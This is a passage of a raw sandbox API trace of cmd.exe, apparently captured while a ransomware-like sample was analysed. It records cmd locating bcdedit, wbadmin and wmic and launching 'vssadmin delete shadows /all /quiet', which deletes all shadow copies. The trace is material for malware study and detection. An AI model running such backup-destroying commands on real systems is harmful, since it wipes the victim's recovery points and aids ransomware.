0x324880 [0076.867] GetProcessHeap () returned 0x310000 [0076.867] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x78) returned 0x32a040 [0077.068] GetProcessHeap () returned 0x310000 [0077.068] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0) returned 0x32a0c0 [0077.069] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0077.069] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0077.069] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0077.069] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0077.069] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0077.069] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0077.069] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0077.069] GetProcessHeap () returned 0x310000 [0077.069] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0) returned 0x311320 [0077.069] GetProcessHeap () returned 0x310000 [0077.069] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x20) returned 0x3248b0 [0077.070] GetProcessHeap () returned 0x310000 [0077.070] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x58) returned 0x32a180 [0077.071] GetProcessHeap () returned 0x310000 [0077.071] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0) returned 0x3113e0 [0077.072] _wcsicmp (_String1="wbadmin", _String2=")") returned 78 [0077.072] _wcsicmp (_String1="FOR", _String2="wbadmin") returned -17 [0077.072] _wcsicmp (_String1="FOR/?", _String2="wbadmin") returned -17 [0077.072] _wcsicmp (_String1="IF", _String2="wbadmin") returned -14 [0077.072] _wcsicmp (_String1="IF/?", _String2="wbadmin") returned -14 [0077.072] _wcsicmp (_String1="REM", _String2="wbadmin") returned -5 [0077.072] _wcsicmp (_String1="REM/?", _String2="wbadmin") returned -5 [0077.072] GetProcessHeap () returned 0x310000 [0077.072] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0) returned 0x3114a0 [0077.072] GetProcessHeap () returned 0x310000 [0077.072] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x20) returned 0x3248e0 [0077.073] GetProcessHeap () returned 0x310000 [0077.073] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x3e) returned 0x311560 [0077.074] GetConsoleTitleW (in: lpConsoleTitle=0x1cf9d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0077.074] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0077.074] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0077.074] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0077.074] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0077.074] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0077.074] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0077.074] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0077.074] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0077.074] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0077.074] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0077.074] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0077.074] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0077.075] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0077.075] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0077.075] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0077.075] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0077.075] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0077.075] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0077.075] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0077.075] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0077.075] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0077.075] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0077.075] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0077.075] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0077.075] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0077.075] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0077.075] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0077.075] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0077.075] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0077.075] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0077.075] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0077.075] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0077.075] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0077.075] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0077.075] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0077.075] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0077.075] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0077.075] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0077.075] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0077.075] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0077.075] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0077.076] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0077.076] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0077.076] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0077.076] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0077.076] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0077.076] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0077.076] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0077.076] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0077.076] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0077.076] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0077.076] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0077.076] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0077.076] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0077.076] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0077.076] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0077.076] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0077.076] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0077.076] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0077.076] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0077.076] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0077.076] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0077.076] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0077.076] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0077.076] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0077.076] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0077.076] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0077.076] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0077.076] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0077.076] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0077.076] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0077.077] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0077.077] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0077.077] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0077.077] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0077.077] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0077.077] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0077.077] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0077.077] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0077.077] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0077.077] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0077.077] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0077.077] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0077.077] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0077.077] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0077.077] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0077.077] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0077.077] GetProcessHeap () returned 0x310000 [0077.077] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x218) returned 0x3115b0 [0077.078] GetProcessHeap () returned 0x310000 [0077.078] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x5c) returned 0x3117d0 [0077.078] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0077.078] GetProcessHeap () returned 0x310000 [0077.078] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x420) returned 0x311840 [0077.078] SetErrorMode (uMode=0x0) returned 0x0 [0077.078] SetErrorMode (uMode=0x1) returned 0x0 [0077.078] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x311850, lpFilePart=0x1cf260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1cf260*="Desktop") returned 0x25 [0077.078] SetErrorMode (uMode=0x0) returned 0x1 [0077.078] GetProcessHeap () returned 0x310000 [0077.078] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x311840, Size=0x6e) returned 0x311840 [0077.079] GetProcessHeap () returned 0x310000 [0077.079] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x311840) returned 0x6e [0077.079] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0cf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0077.079] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0077.079] GetProcessHeap () returned 0x310000 [0077.079] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x128) returned 0x3118c0 [0077.079] GetProcessHeap () returned 0x310000 [0077.079] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x240) returned 0x3119f0 [0077.085] GetProcessHeap () returned 0x310000 [0077.085] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x3119f0, Size=0x12a) returned 0x3119f0 [0077.085] GetProcessHeap () returned 0x310000 [0077.085] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x3119f0) returned 0x12a [0077.085] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0cf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0077.085] GetProcessHeap () returned 0x310000 [0077.085] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xe8) returned 0x311b30 [0077.085] GetProcessHeap () returned 0x310000 [0077.085] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x311b30, Size=0x7e) returned 0x311b30 [0077.085] GetProcessHeap () returned 0x310000 [0077.085] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x311b30) returned 0x7e [0077.087] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.087] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x1cefd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cefd0) returned 0xffffffffffffffff [0077.088] GetLastError () returned 0x2 [0077.088] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x1cefd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cefd0) returned 0xffffffffffffffff [0077.088] GetLastError () returned 0x2 [0077.088] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.088] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x1cefd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cefd0) returned 0x311bc0 [0077.088] GetProcessHeap () returned 0x310000 [0077.088] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x0, Size=0x28) returned 0x32aef0 [0077.088] FindClose (in: hFindFile=0x311bc0 | out: hFindFile=0x311bc0) returned 1 [0077.088] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x1cefd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cefd0) returned 0xffffffffffffffff [0077.089] GetLastError () returned 0x2 [0077.089] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cefd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cefd0) returned 0x311bc0 [0077.089] GetProcessHeap () returned 0x310000 [0077.089] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x32aef0, Size=0x8) returned 0x328b90 [0077.089] FindClose (in: hFindFile=0x311bc0 | out: hFindFile=0x311bc0) returned 1 [0077.089] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0077.089] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0077.089] GetConsoleTitleW (in: lpConsoleTitle=0x1cf520, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0077.089] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf2d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf298 | out: lpAttributeList=0x1cf2d8, lpSize=0x1cf298) returned 1 [0077.089] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf2d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf288, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf2d8, lpPreviousValue=0x0) returned 1 [0077.089] GetStartupInfoW (in: lpStartupInfo=0x1cf3f0 | out: lpStartupInfo=0x1cf3f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0077.089] GetProcessHeap () returned 0x310000 [0077.089] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x20) returned 0x32aef0 [0077.089] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0077.090] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0077.091] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0077.091] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0077.091] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0077.091] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0077.091] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0077.091] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0077.091] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0077.091] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0077.091] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0077.091] GetProcessHeap () returned 0x310000 [0077.091] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32aef0 | out: hHeap=0x310000) returned 1 [0077.091] GetProcessHeap () returned 0x310000 [0077.091] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x12) returned 0x32a1e0 [0077.091] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0077.093] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1cf310*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf2c0 | out: lpCommandLine="vssadmin delete shadows /all /quiet ", lpProcessInformation=0x1cf2c0*(hProcess=0x54, hThread=0x50, dwProcessId=0xac4, dwThreadId=0x5a8)) returned 1 [0077.697] CloseHandle (hObject=0x50) returned 1 [0077.697] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0077.697] GetProcessHeap () returned 0x310000 [0077.697] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32c4c0 | out: hHeap=0x310000) returned 1 [0077.697] GetEnvironmentStringsW () returned 0x32b840* [0077.697] GetProcessHeap () returned 0x310000 [0077.697] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xae8) returned 0x32c330 [0077.697] FreeEnvironmentStringsW (penv=0x32b840) returned 1 [0077.697] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0177.823] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1cf208 | out: lpExitCode=0x1cf208*=0x0) returned 1 [0177.824] CloseHandle (hObject=0x54) returned 1 [0177.824] _vsnwprintf (in: _Buffer=0x1cf478, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf218 | out: _Buffer="00000000") returned 8 [0177.824] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0177.824] GetProcessHeap () returned 0x310000 [0177.824] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32c330 | out: hHeap=0x310000) returned 1 [0177.824] GetEnvironmentStringsW () returned 0x32b840* [0177.825] GetProcessHeap () returned 0x310000 [0177.825] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0e) returned 0x32c360 [0177.825] FreeEnvironmentStringsW (penv=0x32b840) returned 1 [0177.825] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0177.825] GetProcessHeap () returned 0x310000 [0177.825] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32c360 | out: hHeap=0x310000) returned 1 [0177.825] GetEnvironmentStringsW () returned 0x32b840* [0177.825] GetProcessHeap () returned 0x310000 [0177.825] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0e) returned 0x32c360 [0177.825] FreeEnvironmentStringsW (penv=0x32b840) returned 1 [0177.825] GetProcessHeap () returned 0x310000 [0177.825] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32a1e0 | out: hHeap=0x310000) returned 1 [0177.825] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf2d8 | out: lpAttributeList=0x1cf2d8) [0177.825] GetConsoleTitleW (in: lpConsoleTitle=0x1cf910, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0177.826] GetProcessHeap () returned 0x310000 [0177.826] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x218) returned 0x328cf0 [0177.826] GetProcessHeap () returned 0x310000 [0177.826] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x42) returned 0x32fb00 [0177.826] GetProcessHeap () returned 0x310000 [0177.826] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x420) returned 0x328f10 [0177.826] SetErrorMode (uMode=0x0) returned 0x0 [0177.826] SetErrorMode (uMode=0x1) returned 0x0 [0177.826] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x328f20, lpFilePart=0x1cf1a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1cf1a0*="Desktop") returned 0x25 [0177.826] SetErrorMode (uMode=0x0) returned 0x1 [0177.826] GetProcessHeap () returned 0x310000 [0177.826] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x328f10, Size=0x66) returned 0x328f10 [0177.827] GetProcessHeap () returned 0x310000 [0177.827] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x328f10) returned 0x66 [0177.827] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0cf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0177.827] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0177.827] GetProcessHeap () returned 0x310000 [0177.827] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x128) returned 0x32ce80 [0177.827] GetProcessHeap () returned 0x310000 [0177.827] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x240) returned 0x328f90 [0177.827] GetProcessHeap () returned 0x310000 [0177.827] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x328f90, Size=0x12a) returned 0x328f90 [0177.827] GetProcessHeap () returned 0x310000 [0177.827] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x328f90) returned 0x12a [0177.827] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0cf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0177.827] GetProcessHeap () returned 0x310000 [0177.827] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xe8) returned 0x325e00 [0177.827] GetProcessHeap () returned 0x310000 [0177.827] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x325e00, Size=0x7e) returned 0x325e00 [0177.827] GetProcessHeap () returned 0x310000 [0177.827] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x325e00) returned 0x7e [0177.828] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0177.828] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x1cef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef10) returned 0xffffffffffffffff [0177.828] GetLastError () returned 0x2 [0177.828] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wmic", fInfoLevelId=0x1, lpFindFileData=0x1cef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef10) returned 0xffffffffffffffff [0177.828] GetLastError () returned 0x2 [0177.828] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0177.828] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x1cef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef10) returned 0xffffffffffffffff [0177.829] GetLastError () returned 0x2 [0177.829] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic", fInfoLevelId=0x1, lpFindFileData=0x1cef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef10) returned 0xffffffffffffffff [0177.829] GetLastError () returned 0x2 [0177.829] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0177.829] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x1cef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef10) returned 0xffffffffffffffff [0177.829] GetLastError () returned 0x2 [0177.829] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic", fInfoLevelId=0x1, lpFindFileData=0x1cef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef10) returned 0xffffffffffffffff [0177.829] GetLastError () returned 0x2 [0177.829] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0177.829] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x1cef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef10) returned 0x311bc0 [0177.830] FindClose (in: hFindFile=0x311bc0 | out: hFindFile=0x311bc0) returned 1 [0177.830] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x1cef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef10) returned 0xffffffffffffffff [0177.830] GetLastError () returned 0x2 